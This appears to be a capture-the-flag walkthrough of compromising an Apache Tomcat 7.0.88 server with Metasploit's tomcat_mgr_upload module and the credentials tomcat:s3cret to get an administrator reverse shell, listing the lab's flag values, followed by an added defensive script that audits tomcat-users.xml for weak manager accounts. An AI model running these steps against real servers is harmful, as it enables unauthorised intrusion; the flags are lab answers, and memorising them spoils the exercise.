Vulnerabilities


Last updated 2 years ago

Apache

  • I will start by checking out the webserver from a browser.

http://[Target IP]:8080
  • Looks like I get the default web page for Apache Tomcat version 7.0.88.

  • Let's see if we can find any vulnerabilities for it.

Meterpreter

  • I'll start with looking through Metasploit.

msfconsole
search tomcat
  • Exploit 28 looks like it could be something so I will check that one out.

use 28
info
    • It looks like the exploit "should" work.

    • Unfortunately, after inputting the options for the exploit and checking it, it comes back as not exploitable. Let's try some of the others.

  • After doing some further enumerating, I got some credentials that I can use with one of the Metasploit exploits: tomcat:s3cret

use multi/http/tomcat_mgr_upload
show options
  • Set the options to the correct parameters.

exploit
  • And now we have a reverse shell into the system.

  • We also have administrator privileges.

  • Now we can just navigate over to the administrator's profile to find a single text file with both flags.

cd C:\Users\Administrator\Desktop\flags
type "2 for the price of 1.txt"

User Flag

7004dbcef0f854e0fb401875f26ebd00

Root Flag

04a8b36e1545a455393d067e772fe90e

Checking out the link for gives us some info on the exploit.

exploitDB
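
The foothold above depended on the Tomcat manager application accepting tomcat:s3cret. As an added example (not part of the original writeup), this defender-side check parses a tomcat-users.xml file and reports accounts that hold a deploy-capable manager role with a well-known or username-matching password. The sample file and the weak-password list are constructed; only s3cret is taken from this page.

```python
import xml.etree.ElementTree as ET

# Roles that can deploy WAR files through the manager application.
DEPLOY_ROLES = {"manager-gui", "manager-script"}
# Constructed weak-password list: "s3cret" is the value from this writeup,
# the rest are assumptions for illustration.
WEAK_PASSWORDS = {"s3cret", "tomcat", "admin", "password", "changeme", ""}

# Constructed sample tomcat-users.xml, not taken from the target machine.
SAMPLE = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deployer" password="deployer" roles="manager-script"/>
  <user username="monitor" password="tomcat" roles="manager-status"/>
  <user username="ops" password="Vq7#kd92!xLm03pR" roles="manager-gui"/>
</tomcat-users>
"""

def local(tag):
    """Drop an XML namespace prefix such as {http://tomcat.apache.org/xml}."""
    return tag.rsplit("}", 1)[-1]

def audit_tomcat_users(xml_text):
    """Return (username, roles, reason) for deploy-capable weak accounts."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if local(elem.tag) != "user":
            continue
        name = elem.get("username", "")
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        risky = sorted(roles & DEPLOY_ROLES)
        if not risky:
            continue  # cannot deploy applications, out of scope for this check
        if password.lower() in WEAK_PASSWORDS:
            findings.append((name, risky, "well-known password"))
        elif password.lower() == name.lower():
            findings.append((name, risky, "password equals username"))
    return findings

if __name__ == "__main__":
    for name, roles, reason in audit_tomcat_users(SAMPLE):
        print(f"{name}: {reason}; roles {', '.join(roles)}")
```

Passwords stored as digests will not match the plaintext list, so this check only covers files that keep passwords in the clear.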